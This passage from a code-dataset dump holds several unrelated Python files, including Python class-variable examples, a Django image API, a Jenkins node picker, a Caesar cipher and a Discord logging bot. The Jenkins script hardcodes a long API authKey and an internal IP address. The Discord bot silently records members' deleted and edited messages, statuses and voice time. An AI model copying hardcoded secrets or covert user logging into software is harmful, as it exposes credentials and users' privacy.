Test.e=50\n\n\nprint(Test.__dict__)\n\nt=Test()\n\nprint(Test.__dict__)\n\nt.m1()\nprint(Test.__dict__)\n\nTest.m2()\nprint(Test.__dict__)\n\nTest.m3()\nprint(Test.__dict__)\n\nTest.f=60\nprint(Test.__dict__)\n\n\n# acces Static VAriables\n\nprint(Test.a)\nprint(t.a)\n\n# modify the value of 
static variable\n\nclass Test1:\n a=777\n @classmethod\n def m1(cls):\n cls.a=888\n\n @staticmethod\n def m2():\n Test1.a=999\n\nprint(Test1.a)\nTest1.m1()\nprint(Test1.a)\n\nTest1.m2()\nprint(Test1.a)\n\n\nclass Azim:\n a=10\n \n def __init__(self):\n self.b=20\n\n @classmethod\n def m1(cls):\n cls.a=888\n cls.b=999\n\nt1=Azim()\nt2=Azim()\n\nt1.m1() # the class variable is changed\nprint(t1.a,t1.b)\nprint(t2.a,t2.b)\nprint(Azim.a,Azim.b)","repo_name":"Azim-js/OOPSinPY","sub_path":"second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1608452504","text":"from django.http import HttpResponse\nfrom django.utils import timezone\nimport datetime\nfrom dateutil.parser import parse\nimport json\nfrom rest.models import Image\nfrom rest.models import Mission\n\n\ndef get_current_time():\n time = timezone.now().__str__()\n return time\n\n\ndef get_current_image():\n return send_response(Image.objects.last().as_dict())\n\n\ndef get_images(start_number, end_number):\n if start_number < end_number:\n image_results = Image.objects.all().order_by(\"-imagetimestamp\")[start_number:end_number]\n else:\n image_results = Image.objects.all()[:1]\n images = [image.as_dict() for image in image_results]\n return send_response(images)\n\n\ndef get_mission_images(mission_id, start_number, end_number):\n try:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id)).order_by(\"-imagetimestamp\")[start_number: end_number]\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef get_next_mission_images(mission_id, requested_datetime):\n requested_datetime_object = parse(requested_datetime)\n try:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imagetimestamp__gt=requested_datetime_object\n ).order_by(\"-imagetimestamp\")\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n \n\ndef get_next_mission_images_via_image_id(mission_id, image_id, length):\n try:\n if length is None:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imageid__lt=image_id\n ).order_by(\"-imageid\")\n else:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imageid__lt=image_id\n ).order_by(\"-imageid\")[:length]\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef get_next_image_via_image_id(image_id, length):\n if length is None:\n requested_images = Image.objects.filter(\n imageid__lt=image_id\n ).order_by(\"-imageid\")\n else:\n requested_images = Image.objects.filter(\n imageid__lt=image_id\n ).order_by(\"-imageid\")[:length]\n images = [image.as_dict() for image in requested_images]\n return send_response(images)\n\n\ndef post_images(image_object, mission_id):\n try:\n Image.objects.create(imagetimestamp=get_current_time(),\n imageblob=image_object,\n mission_missionid=Mission.objects.get(missionid=mission_id))\n return send_response({\"status\": \"True\"})\n except 
Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef send_response(message):\n return HttpResponse(json.dumps(message))\n\n\ndef send_image_error(message):\n return HttpResponse(json.dumps({\"status\": \"error\",\n \"data\": message\n }),\n status=403)\n","repo_name":"SquireOfSoftware/Orion","sub_path":"rest/image_service.py","file_name":"image_service.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21275645174","text":"import requests\nimport json\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\n\nparser = argparse.ArgumentParser()\nparser.add_argument('wsname')\nargs = parser.parse_args()\nparams = vars(args)\n\ndef getJenkinsNode(ip, authKey, projectId, wbmap, wsname, bnmap):\n getResourceUrl = 'http://{ip}:8085/api/v2/monitoring/resources'.format(ip=ip)\n getBenchStatus = 'http://{ip}:8085/api/v2/monitoring/testexecution'.format(ip=ip)\n getBenchHeartBeat = 'http://{ip}:8085/api/v2/monitoring/heartbeat'.format(ip=ip)\n params = {'projectId':projectId, 'authKey':authKey}\n benches = requests.get(getResourceUrl, params).json()\n avaBenches = loadJson(wbmap)[0][wsname]\n exeProgressDict = {}\n for bench in avaBenches:\n for b in benches:\n if bench in b.values():\n resourceId = benches[benches.index(b)] # type: Dict\n params.update(resourceId)\n online = requests.get(getBenchHeartBeat, params).json()['online']\n if online:\n exeInfo = requests.get(getBenchStatus, params).json()\n benchStatus = exeInfo['status']\n if benchStatus == 'IDLE':\n nodeLabel = loadJson(bnmap)[0][bench]\n return nodeLabel\n else:\n exeProgress = exeInfo['actual']/exeInfo['total']\n exeProgressDict[bench] = exeProgress\n \n idlestBench = list(exeProgressDict.keys())[list(exeProgressDict.values()).index(min(exeProgressDict.values()))]\n nodeLabel = loadJson(bnmap)[0][idlestBench]\n return nodeLabel\n\ndef loadJson(jsonPath):\n with open(jsonPath, 'r') as f:\n jsonContent = f.read()\n text = json.loads(jsonContent)\n return text\n\nip = '10.211.55.2'\nbench_node = 'bench_node_mapping.json'\nws_bench = 'ws_bench_mapping.json'\nauthKey = 'SPsdDWt2WinZ1iZBN9Sb4ehCZe41qZkLJV7uKiBiBhLwS6kOuivdxkbLbAiRIOwrPr_pxnetu0GqK4LagJc8hq-MvraD7YWG9D971fR-X0QxIy7ldwayRl8-CYGEnK7kVKUw4PF3QAWwhFjiN26Khs-RqGuWickjnPFgswXsowFSiBhcPGpEIU10wHG0HdBLtrK_W0noOseSNM2WBeqTA6KZKYfIjab06v5DZJ-rKZRjJU0EMhhP2WhkEPVxPUZeeM7ZPXuFa_1YG9QbfQVGe86EU2eDIrZcfWIaCZrhiZMY_To3O6Zrj2AHHfNBh5yyQRi33V_KNsp2R_fy7qjte6FzXFUoSNHki57XoeXEiq0rZsYunUtvjkZu6hz78bz0f86RxvNlV6K9GKCHnduGGQ=='\nprojectId = '1'\nwsname = params['wsname']\n\n\nidlestBench = getJenkinsNode(ip, authKey, projectId, ws_bench, wsname, bench_node)\nwith open(r'jenkinsNode.properties', 'w') as f:\n f.write('env.jenkinsNode={}'.format(repr(idlestBench)))\n# print(idlestBench)","repo_name":"nwtg/ECU-TEST","sub_path":"getJenkinsNode.py","file_name":"getJenkinsNode.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18459094076","text":"import onmt\nimport onmt.modules\n\n\nclass TranslatorParameter(object):\n\n def __init__(self, filename):\n\n self.model = \"\"\n self.src = \"\"\n self.src_img_dir = \"\"\n self.tgt = \"\"\n self.output = \"\"\n self.beam_size = 1\n self.batch_size = 1\n self.max_sent_length = 100\n self.dump_beam = \"\"\n self.n_best = self.beam_size\n self.replace_unk = False\n self.gpu = -1\n self.cuda = 0\n 
self.verbose = False\n self.normalize = True\n\n self.beta = 0.0\n self.alpha = 0.0\n self.start_with_bos = True\n self.fp16 = False\n self.ensemble_op = 'mean'\n self.autoencoder = None\n self.encoder_type = 'text'\n self.lm = None\n\n self.src_lang = 'src'\n self.tgt_lang = 'tgt'\n self.bos_token = onmt.constants.BOS_WORD\n self.sampling = False\n self.attributes = None\n self.no_bos_gold = False\n self.no_repeat_ngram_size = 0\n self.no_buffering = False\n self.src_align_right = False\n self.read_file(filename)\n\n def read_file(self, filename):\n\n f = open(filename)\n\n line = f.readline()\n\n while line:\n\n w = line.strip().split()\n\n if w[0] == \"model\":\n self.model = w[1]\n elif w[0] == \"beam_size\":\n self.beam_size = int(w[1])\n elif w[0] == \"src_lang\":\n self.src_lang = w[1]\n elif w[0] == \"tgt_lang\":\n self.tgt_lang = w[1]\n elif w[0] == \"no_repeat_ngram_size\":\n self.no_repeat_ngram_size = int(w[1])\n\n line = f.readline()\n\n\nclass OnlineTranslator(object):\n def __init__(self, model):\n opt = TranslatorParameter(model)\n from onmt.inference.fast_translator import FastTranslator\n self.translator = FastTranslator(opt)\n # self.translator = onmt.EnsembleTranslator(opt)\n\n def translate(self,input):\n predBatch, predScore, predLength, goldScore, numGoldWords, allGoldScores = self.translator.translate([input.split()],[])\n\n return \" \".join(predBatch[0][0])\n \n\n","repo_name":"nlp-dke/NMTGMinor","sub_path":"onmt/online_translator.py","file_name":"online_translator.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"}
+{"seq_id":"24467841224","text":"import os\nimport random\nimport shutil\n\n\n# source_file: source path, target_ir: target path\ndef cover_files(source_dir, target_ir):\n for file in os.listdir(source_dir):\n source_file = os.path.join(source_dir, file)\n\n if os.path.isfile(source_file):\n shutil.copy(source_file, target_ir)\n\n\ndef ensure_dir_exists(dir_name):\n \"\"\"Makes sure the folder exists on disk.\n Args:\n dir_name: Path string to the folder we want to create.\n \"\"\"\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ndef moveFile(file_dir, save_dir):\n ensure_dir_exists(save_dir)\n path_dir = os.listdir(file_dir) # get the original image paths\n filenumber = len(path_dir)\n rate = 0.2 # fraction of images to sample, e.g. taking 10 out of 100 images would be 0.1\n picknumber = int(filenumber * rate) # number of images to take from the folder according to rate\n sample = random.sample(path_dir, picknumber) # randomly pick picknumber sample images\n # print (sample)\n for name in sample:\n shutil.move(file_dir + name, save_dir + name)\n\n\nif __name__ == '__main__':\n file_dir = 'D:\AI\BCI\project\EEG_ETR\pytorch-cnn-cifar10-master\Mental Task\Rest\my_train\sub27/' # source image folder path\n save_dir = 'D:\AI\BCI\project\EEG_ETR\pytorch-cnn-cifar10-master\Mental Task\Rest\my_test\sub27/' # destination folder path to move to\n moveFile(file_dir,save_dir)\n\n\n'''\nimport os, sys\nimport random\nimport shutil\n\n\ndef copyFile(fileDir):\n pathDir = os.listdir(fileDir)\n sample = random.sample(pathDir, 300)\n print(sample)\n for name in sample:\n shutil.move(fileDir + name, tarDir + name)\n\n\nif __name__ == '__main__':\n # open /textiles\n path = \"/home/fairy/workspace/dataset/textiles/\"\n dirs = os.listdir(path)\n i = 0\n # output all folds\n for file in dirs:\n print(file)\n i = i + 1\n filename = \"/home/fairy/workspace/dataset/Fabric\" + str(i)\n os.mkdir(filename)\n fileDir = path + \"Fabric\" + str(i) + \"/\"\n tarDir = filename + \"/\"\n 
copyFile(fileDir)\n'''","repo_name":"iwjlrr/FastGAN_EEG","sub_path":"EEG transfor/cut_file.py","file_name":"cut_file.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27628262980","text":"import discord\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport datetime\r\n\r\nfrom library.managers.file_manager import FileManager, Logs\r\nfrom library.managers.sql_manager import SQLManager\r\n\r\n\r\nclass LogBot(commands.Bot):\r\n def __init__(self):\r\n super().__init__(command_prefix = \"!\")\r\n self.active_voices = {}\r\n \r\n def initalize(self):\r\n self.load_extension(\"library.cogs.log_commands\")\r\n\r\n #def destroy(self):\r\n #self.is_logging = False\r\n #self.loop.get_event_loop().wait_until_complete(asyncio.sleep(1))\r\n\r\n ### System events (Use log_entry_key Logs.SYSTEM) ###\r\n async def on_ready(self):\r\n self.file_manager = FileManager()\r\n self.db_manager = SQLManager()\r\n self.db_manager.initalize()\r\n self.file_manager.initalize()\r\n\r\n self.file_manager.add_log(Logs.SYSTEM, f'{self.user} fully initalized and ready to log')\r\n print(\"Fully initalized and ready to rumble\")\r\n\r\n def sync_voice_duration(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n if not 'voice_time' in user: user['voice_time'] = 0\r\n duration = {'member': user, 'connected_voices': []}\r\n if not(member.voice) or not (str(member.id) in self.active_voices):\r\n return duration\r\n \r\n now = datetime.datetime.now()\r\n member_voice = self.active_voices[str(member.id)]\r\n member_joined_at = datetime.datetime.strptime(member_voice['joined_at'], \"%a %b %d %H:%M:%S %Y\")\r\n participants = [participant for participant in member.voice.channel.members if not(participant.id == member.id)]\r\n\r\n user['voice_time'] = int((now - member_joined_at).total_seconds()) + user['voice_time']\r\n \r\n for participant in participants:\r\n active_voice_join_time = datetime.datetime.strptime(self.active_voices[str(participant.id)]['joined_at'], \"%a %b %d %H:%M:%S %Y\")\r\n entry_id = f\"{member.id}-{participant.id}\"\r\n connected_time = self.db_manager.select_data(Logs.VOICE, entry_id)\r\n if not connected_time:\r\n connected_time = {'id': entry_id, 'duration': 0}\r\n connected_time['duration'] = connected_time['duration'] + abs((member_joined_at - active_voice_join_time).total_seconds())\r\n duration['connected_voices'].append(connected_time)\r\n \r\n self.db_manager.set_data(Logs.USER, duration['member'])\r\n for connected_voice in duration['connected_voices']:\r\n self.db_manager.set_data(Logs.VOICE, connected_voice)\r\n return duration\r\n\r\n async def on_error(self, *args, **kwargs):\r\n pass\r\n\r\n async def on_bulk_message_delete(self, messages):\r\n for message in messages:\r\n await self.on_message_delete(message)\r\n\r\n ### User events (Use log_entry_key Logs.USER) ###\r\n async def on_message(self, message):\r\n await self.process_commands(message)\r\n if message.author.bot or message.content[0] == self.command_prefix:\r\n return False\r\n user = self.db_manager.find_user(message.author.id, message.author.name)\r\n user_message = {\r\n 'content': message.content, \r\n 'created_at': message.created_at.ctime(), \r\n 'channel': message.channel.name,\r\n 'id': message.id,\r\n 'owner': message.author.id\r\n }\r\n entry = f'SENT_M: ({message.created_at}) {message.author.name}: {message.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = 
message.author.name)\r\n self.db_manager.set_data(Logs.MESSAGE, user_message)\r\n\r\n async def on_message_delete(self, message):\r\n now = datetime.datetime.now()\r\n user_message = self.db_manager.select_data(Logs.MESSAGE, message.id)\r\n user_message['deleted_at'] = now.ctime()\r\n entry = f'DELETED_M: ({message.created_at}) {message.author.name}: {message.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = message.author.name)\r\n self.db_manager.set_data(Logs.MESSAGE, user_message)\r\n\r\n async def on_message_edit(self, before, after):\r\n entry = f'EDITED_M: \\n\\t BEFORE: ({before.created_at}) {before.author.name}: {before.content} \\n\\t AFTER: ({after.created_at}) {after.author.name}: {after.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = before.author.name)\r\n\r\n async def on_reaction_add(self, reaction, user):\r\n entry = f'ADDED_R: {user.name} reacted {reaction.emoji.name} to {reaction.message.content} by {reaction.message.author.name}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n\r\n async def on_reaction_remove(self, reaction, user):\r\n entry = f'REMOVED_R: {user.name} removed reaction {reaction.emoji.name} to {reaction.message.content} by {reaction.message.author.name}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n\r\n async def on_member_join(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n user['joined_at'] = member.joined_at.ctime()\r\n entry = f'JOINED_M: {member.name} joined'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = member.name)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_member_remove(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n user['removed_at'] = datetime.datetime.now().ctime()\r\n entry = f'REMOVED_M: {member.name} got removed'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = member.name)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_voice_state_update(self, member, before, after):\r\n now = datetime.datetime.now()\r\n entries = []\r\n if before.channel:\r\n entries.append(f'VOICE_LEFT: {member.name} left voicechannel {before.channel.name}')\r\n self.sync_voice_duration(member)\r\n del self.active_voices[str(member.id)]\r\n if after.channel:\r\n entries.append(f'VOICE_JOINED: {member.name} joined voicechannel {after.channel.name}')\r\n self.active_voices[str(member.id)] = {\r\n 'joined_at': now.ctime(),\r\n 'channel_id': after.channel.id,\r\n 'channel_name': after.channel.name\r\n }\r\n\r\n if before.afk:\r\n entries.append(f'VOICE_AFK: {member.name} went afk')\r\n if after.afk:\r\n entries.append(f'VOICE_AFK_B: {member.name} came back from afk')\r\n\r\n if before.deaf:\r\n entries.append(f'VOICE_DEAF_M: {member.name} deafend in {before.channel.name} by moderator')\r\n if after.deaf:\r\n entries.append(f'VOICE_UNDEAF_M: {member.name} un-deafend in {after.channel.name} by moderator')\r\n\r\n if before.mute:\r\n entries.append(f'VOICE_MUTE_M: {member.name} muted in {before.channel.name} by moderator')\r\n if after.mute:\r\n entries.append(f'VOICE_UNMUTE_M: {member.name} unmuted in {before.channel.name} by moderator')\r\n\r\n if before.self_deaf:\r\n entries.append(f'VOICE_DEAF_S: {member.name} self-deafend in {before.channel.name}')\r\n if after.self_deaf:\r\n entries.append(f'VOICE_UNDEAF_S: {member.name} self-undeafend in {after.channel.name}')\r\n\r\n if before.self_mute:\r\n entries.append(f'VOICE_MUTE_S: {member.name} 
self-muted in {before.channel.name}')\r\n if after.self_mute:\r\n entries.append(f'VOICE_UNMUTE_S: {member.name} self-unmuted in {after.channel.name}')\r\n\r\n if before.self_stream:\r\n entries.append(f'STREAM_START: {member.name} started streaming in {before.channel.name}')\r\n if after.self_stream:\r\n entries.append(f'STREAM_END: {member.name} stopped streaming in {after.channel.name}')\r\n\r\n if before.self_video:\r\n entries.append(f'VIDEO_START: {member.name} started video in {before.channel.name}')\r\n if after.self_video:\r\n entries.append(f'VIDEO_END: {member.name} stopped video in {after.channel.name}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = member.name)\r\n\r\n async def on_member_update(self, before, after):\r\n entries = []\r\n if not (before.status == after.status):\r\n entries.append(f'STATUS: {before.name} changed status from {before.status.name} to {after.status.name}')\r\n\r\n if not (before.activity == after.activity):\r\n entries.append(f'ACTIVITY: {before.name} changed activity from {before.activity.name} to {after.activity.name}')\r\n\r\n if not (before.nick == after.nick):\r\n entries.append(f'NICKNAME: {before.name} changed nickname from {before.nick} to {after.nick}')\r\n\r\n if not (before.roles == after.roles):\r\n entries.append(f'ROLES: {before.name} changed roles from ({\",\".join(r.name for r in before.roles)}) to ({\",\".join(r.name for r in after.roles)})')\r\n\r\n #if not (before.pending == after.pending):\r\n #entries.append(f'VERIF_P: {before.name} changed status from {before.status.name} to {after.status.name}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = before.name)\r\n\r\n async def on_user_update(self, before, after):\r\n entries = []\r\n if not (before.avatar == after.avatar):\r\n entries.append(f'AVATAR: {before.name} changed avatar from {before.avatar} to {after.avatar}')\r\n\r\n if not (before.name == after.name):\r\n entries.append(f'USERNAME: {before.name} changed username from {before.name} to {after.name}')\r\n\r\n if not (before.discriminator == after.discriminator):\r\n entries.append(f'DISCRIMINATOR: {before.name} conflicts {before.discriminator} with {after.discriminator}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = before.name)\r\n\r\n ### Moderation events (Use log_entry_key Logs.MOD) ### \r\n async def on_reaction_clear(self, message, reactions):\r\n entry = f'REACTION_CLEAR: message {message.content} by {message.author.name} had reactions {\",\".join(map(lambda reaction: reaction.emoji.name, reactions))} cleared'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_reaction_clear_emoji(self, reaction):\r\n entry = f'EMOJI_CLEAR: message {reaction.message.content} by {reaction.message.author.name} had reaction {reaction.emoji.name} cleared'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n \r\n \"\"\"\r\n async def on_private_channel_update(self, before, after):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_private_channel_pins_update(self, channel, last_pin):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_guild_channel_update(self, before, after):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_guild_channel_pins_update(self, channel, last_pin):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n \"\"\"\r\n\r\n async def on_member_ban(self, guild, user):\r\n user_data = self.db_manager.find_user(user.id, user.name)\r\n if not 'banned_times' in user_data:\r\n user_data['banned_times'] = 0\r\n user_data['banned_times'] += 1\r\n entry = f'USER_BAN: {user.name} got banned'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n self.db_manager.set_data(Logs.USER, user_data)\r\n\r\n async def on_member_unban(self, guild, user):\r\n user_data = self.db_manager.find_user(user.id, user.name)\r\n if not 'unbanned_times' in user_data:\r\n user_data['unbanned_times'] = 0\r\n user_data['unbanned_times'] += 1\r\n entry = f'USER_UNBAN: {user.name} got unbanned'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n self.db_manager.set_data(Logs.USER, user_data)\r\n\r\n async def on_invite_create(self, invite):\r\n entry = f'INVITE_C: invite {invite.url} was created by {invite.inviter}'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_invite_delete(self, invite):\r\n entry = f'INVITE_D: invite {invite.url} was deleted by {invite.inviter}'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n ### Administrative events (Use log_entry_key Logs.ADMIN) ###\r\n \"\"\"\r\n async def on_private_channel_create(self, channel):\r\n pass\r\n\r\n async def on_private_channel_delete(self, channel):\r\n pass\r\n \r\n async def on_guild_channel_create(self, channel):\r\n pass\r\n\r\n async def on_guild_channel_delete(self, channel):\r\n pass\r\n\r\n async def on_guild_update(self, before, after):\r\n pass\r\n\r\n async def on_guild_role_create(self, role):\r\n pass\r\n\r\n async def on_guild_role_delete(self, role):\r\n pass\r\n\r\n async def on_guild_role_update(self, before, after):\r\n pass\r\n\r\n async def on_guild_emojis_update(self, guild, before, after):\r\n pass\r\n \"\"\"","repo_name":"Kavzor/prox_community","sub_path":"library/bots/log_bot.py","file_name":"log_bot.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"73937072249","text":"def ceaser(message, key, mode):\n LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n translated = ''\n message = message.upper()\n key = key%26\n\n for i in message:\n temp = LETTERS.find(i)\n if mode == 'encrypt':\n temp = temp + key\n elif mode == 'decrypt':\n temp = temp - key\n\n if temp >= len(LETTERS):\n temp -= len(LETTERS)\n elif temp < 0:\n temp += len(LETTERS)\n\n translated += LETTERS[temp]\n print(translated)\n\n\nprint(\"Encrypt:\")\nceaser('CYBRARY',27, 'encrypt')\n\nprint(\"Decrypt:\")\nceaser('DZCSBSZ', 27, 'decrypt')\n","repo_name":"AthiraBR/PortfolioProjects","sub_path":"Python/Ceaser-Cipher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"4940587897","text":"import os\nfrom collections import OrderedDict\nfrom functools import partial\n\nimport argparse\nimport warnings\nimport os, re, sys, datetime, time, string\nimport numpy as np, scipy, random, pandas as pd\nimport pickle, json, collections\nfrom pprint import pprint\nimport ruamel_yaml as yaml\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport sensus.common.global_variables as gv\n\nimport torch, torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom sensus.common.constants import *\n\n#%matplotlib inline\n\n# common imports and global settings\nfrom IPython.core.interactiveshell import 
InteractiveShell\nfrom IPython.display import display, HTML\nInteractiveShell.ast_node_interactivity = \"all\"\ndisplay(HTML(\"\"))\n\n\nwarnings.filterwarnings('ignore')\n\nfrom notebooks.chetan.fastaiConsole.fastai.fastai.text import *\n\n\nimport spacy\n\nfrom helpers import *\nfrom create_DataLoader import *\nfrom configuration import *\nfrom pre_train import pre_train\nfrom fine_tune import fine_tune\nfrom train_clas import train_clas\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\",\n action=\"store_true\")\nparser.add_argument(\"-pt\", \"--pre_train\", help=\"pre train on wiki103\",\n action=\"store_true\")\nparser.add_argument(\"-dt\", \"--domain_specific_train\", help=\"fine tune on yelp dataset\",\n action=\"store_true\")\nparser.add_argument(\"-ft\", \"--fine_tune\", help=\"fine tune on the reviews\",\n action=\"store_true\")\nparser.add_argument(\"-cl\", \"--classifier\", help=\"train classifier\",\n action=\"store_true\")\nargs = parser.parse_args()\n\n#print('verbosity', args.verbose)\n\nif args.verbose:\n print('packages imported')\n\n\n## Check GPU Availability\nif args.verbose:\n try:\n print(\"CUDA device available: \\t\\t\", torch.cuda.is_available())\n print(\"CUDA device count: \\t\\t\", torch.cuda.device_count())\n print(\"CUDA device name: \\t\\t\", torch.cuda.get_device_name(0))\n print(\"CUDA device capability: \\t\", torch.cuda.get_device_capability(0))\n print(\"CUDA device properties: \\n\", torch.cuda.get_device_properties(0))\n except:\n print('gpu not found \\nInstall Dependencies')\n\n\nWORK_DIR = Path(os.path.dirname(SENSUS_DIR))\nos.chdir(WORK_DIR)\nDATA_DIR = Path(DATA_DIR)\nCUR_DIR = Data_path = WORK_DIR /'notebooks/chetan'\n\n\nif args.verbose:\n print(\"Set working directory: \", WORK_DIR)\n\n print(\"Data directory: \", DATA_DIR)\n\n## Load spacy model\nlang = 'en'\ntry:\n spacy.load(lang)\nexcept:\n # TODO handle tokenization of Chinese, Japanese, Korean\n print(f\"spacy tokenization model is not installed for {lang}.\")\n lang = lang if lang in [\"en\", \"de\", \"es\", \"pt\", \"fr\", \"it\", \"nl\"] else \"xx\"\n os.system('python -m spacy download {}'.format(lang))\n\n## Training With Wikipedia\n\n\nif args.pre_train:\n data_path = DATA_DIR / 'wikipedia/wiki/en'\n input_sub = \"tmp\"\n train_fname = \"train.csv\"\n val_fname = \"val.csv\"\n\n df_trnC, df_valC = load_data_training(data_path=data_path, n_labels=None, n_textfield=1)\n #print(df_trnC.head())\n assert df_trnC.columns.tolist() == ['labels', 'text']\n assert df_valC.columns.tolist() == ['labels', 'text']\n\n ## Create Dataloader for wiki103\n\n #data_lm_preTrain, vocab_update_wiki, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnC,\n # data_val=df_valC, n_labels=None, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_preTrain_wiki.pkl', vocab_save_path = 'vocab/preTrain_wiki_itos.pkl', bs = 32)\n #\n # ## Save the Dataloader\n #\n # save_workpsace(work_dir=Data_path, data_lm=data_lm_preTrain, save_type=['data_lm'],\n # DataLoaderLM_path='DataLoader/data_lm_preTrain_wiki.pkl')\n\n # Load the dataloader\n data_lm = load_data(Data_path / 'DataLoader', 'data_lm_preTrain_wiki.pkl')\n # print(awd_lstm_lm_config_custom)\n pre_train(Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_preTrain_wiki.pkl',\n model_save_path='DataLoader/models/preTrain_wiki_model',\n encoding_save_path='encoding/preTrain_wiki_encoding',\n cuda_id=0, pretrained=False, custom_config = True, lr = 1e-01, 
arch = AWD_LSTM)\n\n\n\nif args.domain_specific_train:\n # tokenization parameters\n data_path = DATA_DIR / 'yelp'\n input_sub = \"tmp\"\n train_fname = \"train.csv\"\n val_fname = \"val.csv\"\n n_labels = 1\n n_textfield = 1\n chunksize = 100000\n lang = 'en'\n\n df_trnYelp, df_valYelp = load_data_training(data_path=data_path, n_labels=1, n_textfield=1)\n vocab_update = False\n\n # data_lmYelp, vocab_update, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnYelp, data_val=df_valYelp, n_labels = n_labels,\n # use_pretrain_vocab=False, pretrain_path=Data_path / 'vocab',\n # pretrain_vocab_name='pretrain_wiki_itos.pkl',\n # no_update_pretrain_vocab=True, max_vocab=70000, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_domainSpecific_Yelp.pkl', vocab_save_path = 'vocab/domainSpecific_Yelp_itos.pkl', bs = 32)\n\n fine_tune(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_domainSpecific_Yelp.pkl', arch=AWD_LSTM,\n custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 'DataLoader/models/preTrain_wiki_model', Data_path / 'vocab/preTrain_wiki_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=1e-01, model_save_path='DataLoader/models/domainSpecific_Yelp_model', encoding_save_path='encoding/domainSpecific_Yelp_encoding',\n cuda_id=0, vocab_weight_balance=vocab_update)\n\n\nif args.fine_tune:\n data_path = DATA_DIR / 'phase1/bml'\n\n df_trnRev, df_valRev = load_data_training(data_path=data_path, n_labels=10, n_textfield=1)\n\n #print(df_trnRev.head())\n\n data_lmRev, vocab_update, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnRev, data_val=df_valRev,\n use_pretrain_vocab=False, pretrain_path=Data_path / 'vocab',\n pretrain_vocab_name='pretrain_wiki_itos.pkl',\n no_update_pretrain_vocab=True, max_vocab=70000, n_labels=10, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_fineTune_Rev.pkl', vocab_save_path = 